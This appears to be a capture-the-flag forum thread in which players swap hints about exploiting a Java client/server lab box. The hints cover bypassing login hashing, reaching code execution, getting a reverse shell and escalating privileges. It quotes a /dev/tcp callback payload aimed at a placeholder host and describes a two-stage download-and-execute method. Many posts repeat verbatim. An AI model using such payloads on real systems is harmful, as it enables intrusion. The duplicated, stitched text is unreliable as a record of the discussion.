stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
if you have only one argument you can pass, how can you put it in /tmp?
don’t worry about where you put it, just download it and try running it from that directory
stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?
i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)
where does the hashing happen?
I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.
no redirecions, one argument only. i recommend doing it in two stages
I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.
if you have only one argument you can pass, how can you put it in /tmp?
don’t worry about where you put it, just download it and try running it from that directory
You can definitely have more than one argument - I’ve just got user. problem is redirection chars etc.
For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.
Same happening to me. Have tried sending many payload variations from a common tool but have not gotten anything back. Wondering if I need to go deeper and create my own custom one that can be properly cast.
For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.
Hello! There are need to write a custom Shell? Idk but at the moment I am stuk with the debugging and fixing of fy-ct.jr
Can you give me a suggestion? thanks!
Managed to get user, but have no clue how to escalate to root. If someone could give me a nudge that goes beyond “connect the dots”, I would be really grateful
I have finished initial enumeration. I pulled the .jar file into ghidra. Looking at all the posts, I should be using jd-gui instead? Thank you in advance.
Getting this error in Java client Caused by: java.lang.SecurityException: SHA-256 digest error for b…xml | already change the settings but don’t seem to get it to work any help is appreciated!
@Hackalicious said:
Type your comment> @zard said:
Type your comment> @red0nyx said:
Getting this error in Java client Caused by: java.lang.SecurityException: SHA-256 digest error for b…xml | already change the settings but don’t seem to get it to work any help is appreciated!